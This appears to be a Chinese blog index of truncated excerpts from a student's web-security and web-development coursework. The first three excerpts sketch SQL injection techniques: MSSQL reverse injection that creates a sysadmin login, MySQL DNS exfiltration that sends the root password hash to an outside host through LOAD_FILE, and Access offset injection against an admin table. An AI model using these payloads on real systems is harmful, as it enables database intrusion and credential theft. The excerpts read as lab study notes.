MSSQL注入 - 反弹注入
反弹注入关键是opendatasource函数首先在服务器中建立账户exec master.dbo.sp_addlogin username,password;--需要把账户加入管理员组exec master.dbo.sp_addsrvrolemember username,sysadmin;--然后需要创建一个库create database 库名;--创建与靶场相同的字段数在url后加'
MYSQL 注入 - Dns注入
首先注册一个ceye账号 然后配置成如图之后查看mysql的注入模板SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port
4.1 Access注入 — 偏移注入
找到位于产品站式的注入点,用order by 判断出有26个字段,其后用cookies注入 使用union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin发现有三个可以显示的点 3,5,7和图片地址src的25使用admin.* 发现union select 1,2,adm
3.6、正则表达式【作业】
<?php$sh=fopen("sharedStrings.xml","r");$sh1=fread($sh, filesize("sharedStrings.xml"));$sh1=preg_replace('/<phoneticPr type="noConversion" fontId=&quo
3.3、后端开发基础PHP—Php 表单验证【作业】
<?php$conn=mysqli_connect("localhost","root","root","user");$username=$_POST['username'];$password=$_POST['password'];$a='/and|or|sel
2.2、后端基础PHP—Php简介及基本函数-下【作业】
<html><head> <META charset="UTF-8"> <title> login </title></head><body> <form action="test.php" method="po
3.3、后端开发基础PHP - PHP简介及PHP基本函数(上)【作业】
<?php$i=1;$sum=0;for(;$i<=10000;$i++) { if($i%3==0||$i%7==0) $sum+=$i; }echo $sum;?>运行结果:21426429
2.3&2.4、DIV+CSS【作业】
<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>我的QQ空间</title> <style type="text/css"> body{background-ima
2.2、HTML常见标签 - QQ空间框架【作业】
<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>我的QQ空间</title></head><body background="C:\Users\dell\Desktop\111.jpg"><
2.1 前端基础HTML — 编写一个网页 [作业]
<!DOCTYPE html><HTML><HEAD><META CHARSET='UTF-8'><TITLE>My first HTML~</TITLE></HEAD><script>alert("my name is Crustsalt~")</script